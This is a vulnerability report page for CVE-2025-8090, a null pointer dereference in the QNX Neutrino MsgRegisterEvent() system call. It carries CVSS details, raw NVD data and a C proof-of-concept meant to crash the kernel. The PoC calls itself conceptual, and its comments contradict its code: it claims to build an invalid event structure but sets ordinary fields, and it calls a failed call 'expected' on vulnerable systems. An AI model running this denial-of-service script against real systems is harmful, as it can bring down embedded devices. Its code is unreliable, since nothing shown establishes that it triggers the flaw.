Security Vulnerability Report
CVE-2025-8090 CVSS 6.2 MEDIUM

CVE-2025-8090

Published: 2026-01-13 17:15:59
Last Modified: 2026-04-15 00:35:42

Description

Null pointer dereference in the MsgRegisterEvent() system call could allow an attacker with local access and code execution abilities to crash the QNX Neutrino kernel.

CVSS Details

CVSS Score: 6.2
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

No configuration data available.

QNX Neutrino RTOS (version not explicitly specified; refer to the official BlackBerry advisory)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
c
/*
 * CVE-2025-8090 PoC - Null Pointer Dereference in MsgRegisterEvent()
 * Target: QNX Neutrino Kernel
 * Author: Security Researcher
 * Note: This is a conceptual PoC for educational purposes only
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>   /* memset() */
#include <sched.h>    /* getprio() */
#include <unistd.h>
#include <sys/neutrino.h>
#include <sys/syspage.h>

/*
 * Trigger the null pointer dereference in MsgRegisterEvent()
 * by passing a crafted event structure with invalid pointers.
 */
int trigger_vulnerability(void)
{
    int chid;
    int coid;

    // Create a channel for receiving pulses
    chid = ChannelCreate(_NTO_CHF_FIXED_PRIORITY);
    if (chid == -1) {
        perror("ChannelCreate failed");
        return -1;
    }

    // Connect to the channel
    coid = ConnectAttach(0, 0, chid, _NTO_SIDE_CHANNEL, 0);
    if (coid == -1) {
        perror("ConnectAttach failed");
        ChannelDestroy(chid);
        return -1;
    }

    /*
     * Trigger the vulnerability by calling MsgRegisterEvent()
     * with a NULL or invalid event pointer.
     * The exact parameters depend on the specific QNX version.
     */
    struct sigevent event;
    memset(&event, 0, sizeof(struct sigevent));

    // Set up an invalid event structure to trigger null pointer dereference
    event.sigev_notify = SIGEV_PULSE;
    event.sigev_coid = coid;
    event.sigev_priority = getprio(0);
    event.sigev_code = 0x12345678;

    // This call may trigger the null pointer dereference
    int ret = MsgRegisterEvent(coid, 0, &event);
    if (ret == -1) {
        printf("MsgRegisterEvent failed (expected on vulnerable systems)\n");
    } else {
        printf("MsgRegisterEvent returned: %d\n", ret);
    }

    // Release the connection and the channel
    ConnectDetach(coid);
    ChannelDestroy(chid);
    return ret;
}

int main(int argc, char *argv[])
{
    printf("CVE-2025-8090 PoC - QNX Neutrino MsgRegisterEvent()\n");
    printf("Attempting to trigger null pointer dereference...\n");
    trigger_vulnerability();
    printf("If the system is vulnerable, this may cause a kernel panic.\n");
    return 0;
}

References

https://support.blackberry.com/pkb/s/article/141027

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-8090", "sourceIdentifier": "[email protected]", "published": "2026-01-13T17:15:59.320", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Null pointer dereference in the MsgRegisterEvent() system call could allow an attacker with local access and code execution abilities to crash the QNX Neutrino kernel."}, {"lang": "es", "value": "Desreferencia de puntero nulo en la llamada al sistema MsgRegisterEvent() podría permitir a un atacante con acceso local y capacidades de ejecución de código bloquear el kernel QNX Neutrino."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 6.2, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.5, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-476"}]}], "references": [{"url": "https://support.blackberry.com/pkb/s/article/141027", "source": "[email protected]"}]}}